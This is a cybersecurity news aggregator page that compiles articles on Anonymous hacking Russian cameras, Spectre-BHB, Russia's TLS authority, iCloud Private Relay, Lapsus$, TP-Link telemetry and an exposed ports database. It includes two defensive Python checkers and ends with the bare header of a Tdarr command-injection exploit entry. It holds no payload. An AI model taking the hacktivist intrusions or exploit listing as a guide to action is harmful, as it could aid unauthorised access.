Monday, January 20, 2025

Anonymous sent 7 million texts to Russians plus hacked 400 of their security cams


Anonymous and its affiliate groups have sent 7 million text messages to Russian citizens about the war in Ukraine while another group has hacked 400+ security cameras in the country with anti-war messages.

Anonymous hacktivists are claiming to have hacked into hundreds of public surveillance cameras installed across Russia to post messages against the Russian president Vladimir Vladimirovich Putin and in support of Ukraine.

It is worth noting that the hacktivists originally announced the hack on March 7th; however, at the time of publishing this article, most targeted cameras were still compromised and displaying content left by the group.

Details of the Hack

According to Anonymous, the group has compromised more than 400 security cameras in Russia and displayed anti-propaganda messages. The hacktivist collective has also compiled live feeds from 100+ Russian CCTV cameras and posted them on the newly launched website.

Multiple surveillance cameras show anti-Putin messages (Image: Hackread.com via Anonymous)

Apart from running live feeds of compromised security cameras, the website also explains why these cameras were hacked and how Anonymous supports Ukraine in the ongoing conflict between the two countries.

The point of this leak is solely to spread information to the Russian people, and potentially (although unlikely) use these cameras for recon. Since most of these cameras are in deep Russia (and some near the border cities of Ukraine), this is mainly a large anti-propaganda movement. We are however working on cameras in Belarus, Ukraine, and closer to the Ukraine conflict in Russia, that will be used entirely for Recon for the Ukrainian military. That dump will come next.

Anonymous

Cameras Across Multiple Sectors Hacked

The group claims it is trying to hack security cameras in Belarus, Ukraine, and regions closer to the Russian border and will use them to help the Ukrainian military conduct reconnaissance. 

Anonymous has categorized the hacked cameras into Businesses, Outdoor, Indoor, Restaurants, Offices, Schools, and Security Offices, which shows the extent of the hacking. In most cases, Anonymous superimposed English text messages over live feeds such as the following:

For your information, the 200RF.com website was set up by the Ukrainian Internal Affairs Ministry to allow Russian relatives to identify Russian soldiers who were either captured or died during the war.

Screenshot from a live camera feed shows a message left by Anonymous hacktivists (Image: Hackread.com via Anonymous)

7 Million Text Messages Sent to Russians

In another incident, Squad303, a newly formed digital army comprising Anonymous-associated programmers, sent out over 7 million SMS messages to cell phone numbers across Russia.


The group created a tool called 1920.in to allow non-technical individuals to contribute to #OpRussia, which is dubbed the world’s largest cyber operation to date. This campaign aimed to inform the Russian public about the war in Ukraine. Within 48 hours, the group sent out 2 million text messages, and by Tuesday, the SMS count reached 5 million.

In a video, Squad303 stated that they are trying to help Ukraine.

We have a message for the citizens of the free world: the legion is calling you. Ukraine needs you. You are the largest army in the history of the world. You don’t need any weapons or ammunition. Your weapons are smartphones and your ammo is messages sent to Russian citizens.

Anonymous – Squad303


Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Since Russia's recent invasion, the Anonymous collective has been behind a large number of high-profile hacks and DDoS attacks targeting Russian infrastructure. We expect this to continue. Here are some related articles.


Exploit Bypasses Existing Spectre-V2 Mitigations in Intel, AMD, Arm CPUs


Researchers have disclosed a new technique that could be used to circumvent existing hardware mitigations in modern processors from Intel, AMD, and Arm, and stage speculative execution attacks such as Spectre to leak sensitive information from host memory.

Attacks like Spectre are designed to break the isolation between different applications by taking advantage of an optimization technique called speculative execution in CPU hardware implementations to trick programs into accessing arbitrary locations in memory and thus leak their secrets.

While chipmakers have incorporated both software and hardware defenses, including Retpoline as well as safeguards like Enhanced Indirect Branch Restricted Speculation (eIBRS) and Arm CSV2, the latest method demonstrated by VUSec researchers aims to get around all these protections.

Called Branch History Injection (BHI or Spectre-BHB), it’s a new variant of Spectre-V2 attacks (tracked as CVE-2017-5715) that bypasses both eIBRS and CSV2, with the researchers describing it as a “neat end-to-end exploit” leaking arbitrary kernel memory on modern Intel CPUs.

“The hardware mitigations do prevent the unprivileged attacker from injecting predictor entries for the kernel,” the researchers explained.

“However, the predictor relies on a global history to select the target entries to speculatively execute. And the attacker can poison this history from userland to force the kernel to mispredict to more ‘interesting’ kernel targets (i.e., gadgets) that leak data,” the Systems and Network Security Group at Vrije Universiteit Amsterdam added.

Put differently, a piece of malicious code can use the shared branch history, which is stored in the CPU Branch History Buffer (BHB), to influence mispredicted branches within the victim’s hardware context, resulting in speculative execution that can then be used to infer information that should be inaccessible otherwise.

Spectre-BHB renders vulnerable all Intel and Arm processors that were previously affected by Spectre-V2 along with a number of chipsets from AMD, prompting the three companies to release software updates to remediate the issue.

Intel is also recommending that customers disable Linux’s unprivileged extended Berkeley Packet Filter (eBPF), enable both eIBRS and Supervisor-Mode Execution Prevention (SMEP), and add “LFENCE to specific identified gadgets that are found to be exploitable.”

“The [Intel eIBRS and Arm CSV2] mitigations work as intended, but the residual attack surface is much more significant than vendors originally assumed,” the researchers said.

“Nevertheless, finding exploitable gadgets is harder than before since the attacker can’t directly inject predictor targets across privilege boundaries. That is, the kernel won’t speculatively jump to arbitrary attacker-provided targets, but will only speculatively execute valid code snippets it already executed in the past.”
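A defender's check of the posture Intel recommends above (eIBRS and SMEP on, unprivileged eBPF off), as an added example that is not from the article or from the VUSec researchers. It reads the Linux sysfs, sysctl and cpuinfo paths named in the code; the status strings in SAMPLES are constructed to resemble the spectre_v2 sysfs text, whose exact wording varies by kernel version, so the checks key on the "Vulnerable"/"Mitigation" prefix and the eIBRS token rather than on whole strings.

```python
"""Summarise a Linux host's Spectre-v2 / Spectre-BHB mitigation posture against
the three recommendations quoted in the article: eIBRS on, SMEP on, and
unprivileged eBPF off.
"""
from pathlib import Path

SPECTRE_V2_SYSFS = Path("/sys/devices/system/cpu/vulnerabilities/spectre_v2")
BPF_SYSCTL = Path("/proc/sys/kernel/unprivileged_bpf_disabled")
CPUINFO = Path("/proc/cpuinfo")


def assess(spectre_v2_status, unprivileged_bpf_disabled, cpu_flags):
    """Return a list of findings; an empty list means all three recommendations hold.

    spectre_v2_status: contents of the spectre_v2 sysfs file.
    unprivileged_bpf_disabled: value of the kernel.unprivileged_bpf_disabled
        sysctl ("0" allows unprivileged BPF; "1" and "2" disable it).
    cpu_flags: the space-separated "flags" field from /proc/cpuinfo.
    """
    status = spectre_v2_status.strip()
    if status.startswith("Not affected"):
        return []  # nothing to mitigate on this CPU
    findings = []
    if status.startswith("Vulnerable"):
        findings.append(f"kernel reports spectre_v2 as vulnerable: {status}")
    # Older kernels print "Enhanced IBRS", newer ones "Enhanced / Automatic IBRS";
    # the vulnerable-state strings use the short token "eIBRS".
    if "eIBRS" not in status and "Enhanced" not in status:
        findings.append("eIBRS not reported in the spectre_v2 mitigation")
    if unprivileged_bpf_disabled.strip() == "0":
        findings.append("unprivileged eBPF is enabled (kernel.unprivileged_bpf_disabled=0)")
    if "smep" not in cpu_flags.split():
        findings.append("CPU does not advertise SMEP")
    return findings


def read_or(path, default):
    """Read a pseudo-file, falling back to `default` off-Linux or without permission."""
    try:
        return path.read_text()
    except OSError:
        return default


def cpuinfo_flags(cpuinfo_text):
    """Extract the first 'flags' line from /proc/cpuinfo text."""
    for line in cpuinfo_text.splitlines():
        if line.startswith("flags"):
            return line.split(":", 1)[1]
    return ""


def assess_live_host():
    """Run the assessment against the host this script runs on."""
    return assess(
        read_or(SPECTRE_V2_SYSFS, "unknown"),
        read_or(BPF_SYSCTL, "0"),
        cpuinfo_flags(read_or(CPUINFO, "")),
    )


# Constructed samples (status text, unprivileged_bpf_disabled, cpu flags).
SAMPLES = {
    "hardened": ("Mitigation: Enhanced IBRS, IBPB: conditional, RSB filling", "2", "fpu vme smep smap"),
    "eibrs_with_ebpf": ("Vulnerable: eIBRS with unprivileged eBPF", "0", "fpu vme smep smap"),
    "retpoline_only": ("Mitigation: Retpolines, IBPB: conditional, RSB filling", "1", "fpu vme"),
}

if __name__ == "__main__":
    for name, args in SAMPLES.items():
        print(name, "->", assess(*args) or ["ok"])
    print("this host ->", assess_live_host() or ["ok"])
```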


Russia Uses New State-run TLS Certificate Authority to Avoid Sanctions


The Russian government has established its own TLS certificate authority (CA) to address issues with accessing websites that have arisen in the wake of sanctions imposed by the west following the country’s unprovoked military invasion of Ukraine.

According to a message posted on the Gosuslugi public services portal, the Ministry of Digital Development is expected to provide a domestic replacement to handle the issuance and renewal of TLS certificates should they get revoked or expired.

The service is offered to all legal entities operating in Russia, with the certificates delivered to site owners upon request within 5 working days.

TLS certificates are used to digitally bind a cryptographic key to an organization’s details, enabling web browsers to confirm the domain’s authenticity and ensure that the communication between a client computer and the target website is secure.

The proposal comes as companies like DigiCert have been restricted from doing business in Russia following sanctions by Western nations. Cybersecurity firms Avast, ESET, Fortinet, and Imperva have also suspended operations in Russia and Belarus over the Kremlin’s invasion of Ukraine.

“In response to the evolving geopolitical situation in Ukraine, DigiCert is pausing issuance and reissuance of all certificate types affiliated with Russia and Belarus. This includes suspending issuance and reissuance of certificates to TLDs related to Russia and Belarus, as well as to organizations with addresses in Russia or Belarus,” the public key infrastructure (PKI) provider noted in an advisory.

This includes suspending issuance and reissuance of certificates to top-level domains (TLDs) related to Russia and Belarus, counting .by, .moscow, .ru, .ru.com, .ru.net, .su, .tatar, .бел, .москва, .рус, and .рф.

What’s not clear is whether web browsers such as Google Chrome, Microsoft Edge, Mozilla Firefox, and Apple Safari, intend to accept the certificates issued by the new Russian certificate authority so that safe connections to the certified servers can work as intended.

But according to a tweet shared by Juan Andres Guerrero-Saade, principal threat researcher at SentinelOne, the public services agency is recommending the use of Russian browsers like Yandex and Atom. “To have access to all sites and the necessary online services, including public services, we recommend installing browsers that support the Russian certificate,” the email reads.

This also poses significant risks in that it could potentially be weaponized to carry out man-in-the-middle (MitM) attacks on HTTPS sessions originating from internet users in the country, enabling the relevant authorities to intercept, decrypt, and re-encrypt the traffic passing through their systems.

“This is insane. Is this the full totalitarian Man-in-the-Middle?,” Guerrero-Saade tweeted.

The development also comes close on the heels of disclosures from Cisco Talos that opportunistic cybercriminals are cashing in on the ongoing conflict to target unwitting users seeking tools to carry out their own cyberattacks against Russian entities by offering malware purporting to be offensive cyber tools.

“The global interest in the conflict creates a massive potential victim pool for threat actors and also contributes to a growing number of people interested in carrying out their own offensive cyber operations,” the researchers said.

“These observations serve as reminders that users must be on heightened alert to increased cyber threat activity as threat actors look for new ways to incorporate the Russia-Ukraine conflict into their operations.”


UK Network Operators Target iCloud Private Relay in Complaint to Regulator


A group of UK network operators have formally urged the UK’s Competition and Markets Authority (CMA) to regulate iCloud Private Relay, claiming that Apple’s privacy service is anti-competitive, potentially bad for users, and a threat to national security.

In its response to the CMA’s Interim Report on mobile ecosystems, Mobile UK, a trade association of British mobile network operators including EE, Virgin Media O2, Three and Vodafone, has raised concerns that iCloud Private Relay can have a negative impact on user experience, internet safety, and competition.

iCloud Private Relay was a new service introduced with iOS 15 that ensures all traffic leaving an iPhone, iPad, or Mac is encrypted and passed through two separate internet relays, so that companies cannot use personal information like IP address, location, and browsing activity to create a detailed profile of users.

Following a formal complaint about Private Relay from Microsoft, Mobile UK claims that the privacy service can have undesired side-effects for users: “Private Relay affects Apple users in many ways, beyond simply what level of privacy a user wants.” For example, “Apple users have suffered a worse browsing experience when using Private Relay.” This is alleged to have the potential to push users to “migrate” away from “the Safari browser to apps downloaded from the App Store where Apple can earn a commission.”

Private Relay prevents network providers from seeing the network traffic from Safari and unencrypted applications. In preventing network operators from seeing this traffic, Mobile UK says that Private Relay prevents service providers from understanding “demand patterns across mobile networks,” inhibiting their ability to effectively diagnose customer issues.

Moreover, Private Relay is alleged to compromise “content filtering, malware, anti-scamming and phishing protection provided by network providers.” Mobile UK also claims that Private Relay is a threat to national security, since it “impairs the insights available under the Government’s investigatory powers, with implication for law enforcement” with regards to “terrorism, serious organized crime, child sexual abuse, and exploitation.”

Private Relay purportedly allows Apple “to leverage its considerable market power into many areas of the market and thus being able to further entrench its position.” Mobile UK says that due to Private Relay, “providers will be unable to use the traffic data to develop their own competing mobile browsers in the future,” as well as other services that directly compete with Apple:

Network providers would no longer be able to use web traffic data over Safari to develop their own digital products and services that compete directly with Apple. For example, a network provider may no longer have access to information about a user’s content viewing habits to develop their own content that competes with Apple TV. Similarly, a network provider may no longer be able to share consumer insight with third parties that provide digital advertising services in competition with Apple Search Ads…

Mobile UK asserts that the ability of UK Internet Service Providers (ISPs) “to differentiate and compete in the market on fair terms” is actively undermined by Private Relay since Apple is effectively becoming an ISP itself:

Apple unilaterally terminates the role of the mobile and fixed connectivity provider in resolving the internet connection, with Apple itself taking over the role of the ISP. The mobile and fixed connectivity provider’s role is reduced to providing conveyance from the handset/home to the Apple iCloud platform.

Mobile UK is concerned that “Apple could thus leverage its position in the device and operating system to grow its iCloud+ user base to develop its position as an ISP.”

Moreover, the trade association said that Private Relay directs users to more Apple services, “accessing the internet in a manner curated by Apple.” Private Relay enables Apple “to favor its own proprietary applications and service, at the expense of other providers.”

Mobile UK also said that Private Relay “affects competition in mobile browsers,” highlighting that “rival browsers cannot differentiate themselves easily” as a result of Apple’s WebKit browser engine restriction. The organization complains that users cannot “switch to an alternative browser” to skirt Private Relay since “the ability of rival browsers to differentiate themselves from Safari will still be limited by the terms of Apple’s browser engine.”

In conclusion, the trade association says that Private Relay must be regulated beyond its superficial existence as a privacy service:

Mobile UK is very concerned that consumers are not fully informed about how Private Relay works or that they understand the full implications of invoking the services…

[…]

The impact of Private Relay is therefore multi-dimensional and cannot be assessed solely through a privacy lens.

Mobile UK urged the CMA to implement “a remedy that limits the use of Private Relay,” or “at the very least” prevent “Apple from making Private Relay a default-on service.” The complaint noted that “Private relay is currently default-off but it is already being used by a significant portion of Apple customers in the UK, despite being in beta mode.”

Private Relay should not be presented as a set-up option or installed as an on-by-default service. It should be made available as an app with which others can compete with similar services such as VPNs. Apple should notify relevant third parties in advance of introducing Private Relay services, so that third parties can inform their customers of how their service may change were Private Relay to be used. For example, advance warning of the introduction of Private Relay would have allowed network providers to inform customers how their security solutions may change and also inform Government how it changes their investigatory powers insight from network traffic data.

For more information, see Mobile UK’s full submission to the CMA. iCloud Private Relay has come under similar skepticism in the European Union, where major mobile operators sought the banning of Private Relay for infringing upon EU “digital sovereignty.”

Earlier this week, Apple aggressively defended its ecosystem in its detailed response to the CMA. It said that the regulator had set the benefits of Apple’s ecosystem aside “without reasoned basis, either ignoring them entirely or dismissing them on the basis of nothing more than speculation.” Apple alleged that the CMA’s Interim Report was based on “unsubstantiated allegations and hypothetical concerns raised primarily by self-serving complaints” from a handful of multi-billion dollar companies, “all seeking to make deep changes to the iPhone for their own commercial gain, without independent verification.”


Ubisoft Breach – ‘cyber security incident’, Developers Reset Staff Passwords


Video game developer Ubisoft has confirmed that it suffered a ‘cyber security incident’ that caused disruption to its games, systems, and services.

The announcement comes after multiple Ubisoft users had reported issues last week accessing their Ubisoft service.

Data extortion group LAPSUS$, who has claimed responsibility for hacking Samsung, NVIDIA, and Mercado Libre thus far, appears to be behind this incident.

Ubisoft Breach: Developers Initiate ‘company-wide password reset’

Video game production giant Ubisoft states it experienced a cyber security incident sometime last week.

“Last week, Ubisoft experienced a cyber security incident that caused temporary disruption to some of our games, systems, and services,” says the company in a succinct news release.

“Our IT teams are working with leading external experts to investigate the issue. As a precautionary measure we initiated a company-wide password reset.”

Headquartered in Montreuil with its studios around the world, the game maker has repeatedly produced hit titles including Assassin’s Creed, Far Cry, For Honor, Just Dance, Prince of Persia, Rabbids, Rayman, Tom Clancy’s, and Watch Dogs.

On March 4th, users on Twitter and Downdetector reported issues accessing some Ubisoft services that appear to be linked to this incident.

At this time, there is no evidence indicating any personal information of players was exposed during the incident.

The company confirms that all Ubisoft games and services are now functioning normally.

LAPSUS$ group reacts to the disclosure

News of Ubisoft confirming the cyber security incident was first reported by The Verge.

Moments later, admins of what is believed to be Lapsus$‘ Telegram group reacted to The Verge’s initial report with a smirk emoji, insinuating that Lapsus$ is behind the hack:

Lapsus$ has previously leaked gigabytes of proprietary data purportedly stolen from leading companies; Samsung, NVIDIA, and Mercado Libre confirmed this month that they had suffered a breach.

Data extortion groups like Lapsus$ breach victims but as opposed to encrypting confidential files like a ransomware operator would, these actors steal and hold on to victims’ proprietary data, and publish it should their extortion demands not be met.

In 2020, Egregor ransomware hit game developer Crytek and leaked what the group claimed were files stolen from Ubisoft’s network, although at the time Ubisoft did not confirm the authenticity of the claim.

In this case, however, it does not seem that Lapsus$ or any other threat actor was able to obtain Ubisoft’s proprietary data, and the investigation continues.


TP-Link Privacy Violation: Router Sends Data To 3rd Parties Without Consent


Chinese network equipment manufacturer TP-Link says it is “developing a security service in partnership with” the German antivirus software company Avira. However, a report posted on Reddit claims that “TP-Link routers are sending a large amount of traffic to Avira’s server even if related services are turned off,” and it has become a hot topic.

Privacy Concerns, Violation of GDPR.

TP-Link Routers Send ALL Your Web Traffic To 3rd Party Servers

I recently enabled a DNS gateway to be able to see requests from my router, and network devices. Was surprised to find 80K + requests (in 24 hours) out to an Avira “Safe Things” subdomains *.safethings.avira.com (far more than any other server).

Digging into this more, I found that it is related to the built-in router security “Home Shield” that ships with newer TP-Link routers – https://oem[.]avira.com/en/solutions/safethings-for-router-manufacturers

Here is the kicker though, I have the Avira / Home Shield services completely turned off (I wasn’t even subscribed to their paid service for it). The router doesn’t care, and sends ALL your traffic to be “analyzed” anyhow. See this response from TP Link (towards bottom of review) from last year – https://www.xda-developers[.]com/tp-link-deco-x68-review/#:~:text=TP%2DLink%20says%20the%20network%20activity Update: I emailed reviewer to confirm TP-Link never updated him after.

I contacted support about this again, and was given a non-answer about how the requests are to check subscription status. 80K + requests a day to check subscription status? Also the rate of requests is not constant, it is higher when my internet traffic is higher. To me this lack of consistent answer / response from TP-Link is as concerning as the requests themselves.

I’m not seeing much online about this issue, as I don’t think many people realize it is even occurring (since traffic is outgoing straight from router, as opposed to an individual computer). Hoping to gain some attention on this issue and get a real answer / response from TP-Link about what exactly is going on here. As well as a concrete timeline and promise for a fix to stop these outgoing requests, when we aren’t even using their anti-virus services.

Edit: Additional details, this is on their WiFi 6 AX3000 (Archer AX55) Router. From the XDA Review it looks like this is also happening on their Deco series. If you want to easily check your own router, you can use any DNS Gateway (NextDNS, Cloudflare Gateway, Pi-hole, etc.). Just be sure to set the DNS servers under “Advanced->Network->Internet->Advanced Settings” because the DHCP DNS server setting will only apply to the devices inside the network, not the router itself.

Edit #2: I’ve also contacted Avira directly regarding the endpoints, in the hope that they’ll be more straightforward than TP-Link about the purpose. Will update here when I receive a response.

Edit #3: If anyone knows of good industry contacts, who can dig into this more or get real answers, please send a message! I’ve seen GamerNexus brought up a few times, but don’t see any contact method.

Comment from user on reddit, no source: TP-Link says the network activity is due to “the Avira cloud data base [distinguishing] whether [the network request is] secure data or malware.” A firmware update is in the works that will turn this functionality off if no Avira network features are enabled in the app, but there is no estimated timeline for that yet.

transcribed from reddit
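The check the poster describes (pointing the router at a DNS gateway and looking at what it resolves on its own behalf) can be automated over the gateway's query log. The following is an added example, not code from the Reddit thread or from TP-Link or Avira: it parses Pi-hole/dnsmasq-style "query[...]" log lines and flags domains that dominate the router's own lookups. The log lines are constructed; the router address 192.168.0.1 and the non-Avira hostnames are assumptions, and only the *.safethings.avira.com domain comes from the post.

```python
"""Aggregate dnsmasq/Pi-hole query logs by client and registrable domain to
surface DNS lookups made by the router itself rather than by LAN devices.
"""
import re
from collections import Counter, defaultdict

# One dnsmasq query record per line, e.g.
# "Mar 11 10:22:01 dnsmasq[1234]: query[A] a1.safethings.avira.com from 192.168.0.1"
QUERY_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ (?P<hm>\d\d:\d\d):\d\d) \S+ query\[(?P<qtype>\w+)\] "
    r"(?P<name>\S+) from (?P<client>\S+)$"
)

# Constructed sample log: the router (192.168.0.1) resolving Avira telemetry
# hosts plus two unrelated names, and one LAN client browsing normally.
SAMPLE_LOG = """
Mar 11 10:22:01 dnsmasq[1234]: query[A] a1.safethings.avira.com from 192.168.0.1
Mar 11 10:22:01 dnsmasq[1234]: query[A] a2.safethings.avira.com from 192.168.0.1
Mar 11 10:22:02 dnsmasq[1234]: query[AAAA] a1.safethings.avira.com from 192.168.0.1
Mar 11 10:22:03 dnsmasq[1234]: query[A] a3.safethings.avira.com from 192.168.0.1
Mar 11 10:22:05 dnsmasq[1234]: query[A] a1.safethings.avira.com from 192.168.0.1
Mar 11 10:22:07 dnsmasq[1234]: query[A] a2.safethings.avira.com from 192.168.0.1
Mar 11 10:22:09 dnsmasq[1234]: query[A] ntp.example.net from 192.168.0.1
Mar 11 10:22:10 dnsmasq[1234]: query[A] cloud.example-vendor.com from 192.168.0.1
Mar 11 10:22:11 dnsmasq[1234]: query[A] www.example.org from 192.168.0.42
Mar 11 10:22:12 dnsmasq[1234]: query[A] cdn.example.net from 192.168.0.42
Mar 11 10:22:13 dnsmasq[1234]: forwarded www.example.org to 1.1.1.1
Mar 11 10:22:14 dnsmasq[1234]: reply www.example.org is 203.0.113.5
"""


def registrable_domain(name, labels=2):
    """Collapse a hostname to its last `labels` labels (a1.safethings.avira.com -> avira.com)."""
    parts = name.rstrip(".").lower().split(".")
    return ".".join(parts[-labels:])


def parse_queries(lines):
    """Yield (hour_minute, client, name, qtype) for each dnsmasq query record;
    forwarded/reply/cached records are skipped."""
    for line in lines:
        m = QUERY_RE.match(line.strip())
        if m:
            yield m["hm"], m["client"], m["name"], m["qtype"]


def summarize(lines):
    """Return {client: Counter(registrable_domain -> query count)}."""
    per_client = defaultdict(Counter)
    for _, client, name, _ in parse_queries(lines):
        per_client[client][registrable_domain(name)] += 1
    return per_client


def queries_per_minute(lines, client):
    """Return Counter("HH:MM" -> queries) for one client, to compare the request
    rate against periods of heavy browsing as the post describes."""
    rate = Counter()
    for hm, c, _, _ in parse_queries(lines):
        if c == client:
            rate[hm] += 1
    return rate


def flag_router_telemetry(lines, router_ip, min_share=0.5):
    """Return [(domain, count, share)] for domains that account for at least
    `min_share` of the lookups the router makes for itself."""
    counts = summarize(lines).get(router_ip, Counter())
    total = sum(counts.values())
    flagged = []
    for domain, n in counts.most_common():
        share = n / total if total else 0.0
        if share >= min_share:
            flagged.append((domain, n, round(share, 2)))
    return flagged


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for client, counts in summarize(lines).items():
        print(client, dict(counts))
    print("flagged:", flag_router_telemetry(lines, "192.168.0.1"))
```

Against a real Pi-hole, feed it `/var/log/pihole.log` (or the equivalent export from another gateway) and set `router_ip` to the router's LAN address; lookups from that address are the router's own, since LAN devices appear under their own IPs.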

Our Conclusion

At this time, we have yet to fully conclude this; however, it is very clear that this device sends user data to a third party without the user’s permission or consent. This would be a clear violation, at the very least, of the General Data Protection Regulation (GDPR) rules. Germany-based Avira said it would have to modify its services because it needs to be GDPR compliant.



War and Inflation Threaten World Economy


The war and sanctions, which include a US ban on Russian oil imports, are raising prices of energy and other key commodities

The world economy’s fragile recovery from the Covid-induced crisis is now threatened by Russia’s war in Ukraine and soaring commodity prices.

Here are four questions regarding the risks to global GDP:

– Will growth stall? –

“The war happened right at a time when Europe and the US had a recovery that was going really well. Projections in Europe were among the highest … (in) the last 20 years,” said Jacob Kirkegaard, resident senior fellow with the German Marshall Fund of the United States in their Brussels office.

In just two weeks, the war has had a “material impact” on the economy, European Central Bank chief Christine Lagarde said Thursday, revising the growth outlook for the eurozone to 3.7 percent for 2022, from 4.2 percent forecast in December.

The war and sanctions, which include a US ban on Russian oil imports, are causing prices of energy and other key commodities like wheat, fertilisers and metals to surge, International Monetary Fund chief Kristalina Georgieva said.

That comes “on top of already high inflation,” Georgieva said.

“We got through a crisis like no other with the pandemic. We are now in an even more shocking territory.”

Credit rating agency S&P has cut its projection for global growth this year to 3.4 percent — a decline of 0.7 percentage points over its earlier forecast due to the expected slump in Russia’s sanctions-hit economy and rising energy costs.

Moreover, the cost of hosting Ukrainian refugees and budgetary aid will cost the European Union 175 billion euros ($192 billion), economist Jean Pisani-Ferry from the Paris-based Bruegel Institute think-tank said.

“I don’t think that global economy will go into a recession,” said Kirkegaard.

But he warned of the threat from stagflation — persistently high inflation combined with high unemployment and stagnant demand.

– Why are prices soaring? –

Inflation has been rising worldwide for a year — due to Covid-linked disruptions in supply chains, leading to a spurt in the prices of raw materials which have raised production costs.

The war has sent oil and gas prices soaring, threatening to worsen inflationary pressure.

Federal Reserve Chair Jerome Powell told the US Congress that every $10 hike in oil prices would impact growth by 0.1 percentage points and add 0.2 percentage points to inflation.

The United States recorded 7.9 percent inflation in February — a new 40-year high.

“We are facing an oil shock, a gas shock and an electricity shock. This has never happened together,” said Thomas Pellerin-Carlin, director of the Jacques Delors energy institute.

Apart from oil and gas, other key commodities have been affected, with prices of aluminium, nickel and wheat skyrocketing.

Russian President Vladimir Putin on Thursday warned of inflationary pressures worldwide as a result of the Western sanctions on his country.

Several key industries have already been hit, with several steel plants in Spain shutting down due to high energy prices.

Millions of households are finding it more expensive to travel, heat their homes and bring food to the table.

“The price of bread went up enormously” since the war began, said Omar Azzam, a Cairo resident, referring to a 50 percent hike in a country which is the world’s top wheat importer.

– More stimulus on the way? –

Nations launched huge stimulus programmes to prevent their economies from crumbling after the pandemic emerged in 2020.

But governments are loath to dig much deeper into public finances.

Aid will likely be more targeted. The G7 group of industrialised nations, for instance, has called for massive support to households slammed by energy costs.

Emerging nations, however, will be more fragile and vulnerable to inflation and even political instability, experts warn.

– Is Covid still a threat? –

While many countries are easing Covid restrictions, China has been doing the opposite.

The world’s second biggest economy on Friday locked down Changchun, a city of nine million people, to control a fresh wave of coronavirus.

If such measures continue, they will hit the world hard, warned Kirkegaard.

“The Chinese economy will slow dramatically, China will shut down whatever they need to shut down,” he said.

“It is as big and unknown as the war in Ukraine because unlike Europe and the US that are able to live with Covid, it is certainly not the case in China,” he said.


Canadian NetWalker Ransomware Operator Extradited to U.S.

Charges against the individual – Sebastien Vachon-Desjardins, 34, of Gatineau, Quebec, Canada – were announced last year, when law enforcement authorities in the U.S. and Europe seized the dark web sites used in the NetWalker ransomware operations.

Offered under the ransomware-as-a-service (RaaS) business model, NetWalker – also known as Malito – emerged in 2019 and has been involved in a variety of high-profile attacks, including ones targeting education, government, health, and public transportation organizations.

The U.S. Department of Justice said that dozens of entities worldwide were hit by NetWalker, which “specifically targeted the healthcare sector during the COVID-19 pandemic, taking advantage of the global crisis to extort victims.”

According to court documents, Vachon-Desjardins was involved in the NetWalker operations between April and December 2020.

He was arrested on January 27, 2021. During the search of Vachon-Desjardins’s home in Gatineau, Canadian law enforcement officers discovered and seized 719 Bitcoin – currently valued at roughly $28 million – and $790,000 in Canadian currency.

The investigators also seized over 20 terabytes of data from Vachon-Desjardins’s computers, which led to the identification of 17 compromised Canadian companies.

On January 31, during a video hearing in a Canadian court, the defendant pleaded guilty to three of the charges brought against him. He was sentenced to seven years in prison, ordered to forfeit most of the seized Bitcoin, computers, and cash, and ordered to pay restitution of over $2.6 million in Canadian currency.


Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Open Database Leaves Major Chinese Ports Exposed to Shipping Chaos

The freight logs of two major Chinese shipping ports have been leaking data, a problem which if left unresolved could disrupt the supply chain of up to 70,000 tonnes of cargo a day, with potentially serious consequences for international shipping.

The Cybernews® research team identified an open ElasticSearch database, exposed to the public, which contained more than 243GB of data detailing current and historic ship positions. Analyzing the data, the team determined that it is highly likely to belong to the Yangtze river ports of Nanjing and Zhangjiagang.

The discovery is especially timely, given the escalation of the geopolitical situation caused by Russia’s recent decision to invade Ukraine. “This could have gone very badly if bad guys had found it before we did,” said a spokesperson for Cybernews.

ElasticSearch lacks a default authentication and authorization system – meaning the data must be put behind a firewall, or else run the risk of being freely accessed, modified or deleted by threat actors. Push access logs from zjgeport[.]com found in the database contained user IDs and, most importantly, API keys that could in theory permit universal access, allowing a cybercriminal to write new data about current ship positions.

Chinese Ports Exposed

In layman’s terms, what this means is that if left unplugged, the gap could allow threat actors to read, delete or alter any of the entries in the exposed databases – or even create new ones for cargoes or ships that don’t exist. Moreover, conventional criminals could physically hijack a ship and jam its communications, leaving the port that controls and tracks its movements unaware that the vessel had been boarded.

That in turn could jeopardize up to 3,100 vessels that transport more than 250 million tonnes of cargo annually to and from the two ports – not to mention putting at risk the lives of the estimated 40,000 passengers a year that use Nanjing for sea travel.

The Cybernews team said: “Because of the way ElasticSearch architecture is built, anybody with access to the link has full administrator privileges over the data warehouse, and is thus able to edit or delete all of the contents and, most likely, disrupt the normal workflow of these ports.

“Because both of these ports directly connect factories based in China to international waters, it’s more than likely that they carry international cargo, thus creating a butterfly effect likely to affect the whole supply chain worldwide if the open instance is not closed.”

Zhangjiagang’s main cargoes include steel, timber, coal, cement and chemical fertilizers, while Nanjing typically trades in goods such as metal ore, light industrial goods, petroleum and pharmaceutical products. With Russia having incurred global sanctions as a result of its invasion of Ukraine, the fate of China’s economy will be more important than ever as it seeks to fill the vacuum created by its superpower neighbor’s expulsion from the world stage.

Since being alerted to the problem by Cybernews, the owners of the ElasticSearch database have enforced HTTP Authentication as a requirement for access, effectively cutting it off from the public side of the internet.


Original Post @CyberNews


Tdarr 2.00.15 – Command Injection

# Exploit Title: Tdarr 2.00.15 - Command Injection

# Exploit Author: Sam Smith
# Vendor Homepage: https://tdarr.io
# Software Link: https://f000.backblazeb2.com/file/tdarrs/versions/2.00.15/linux_arm64/Tdarr_Server.zip
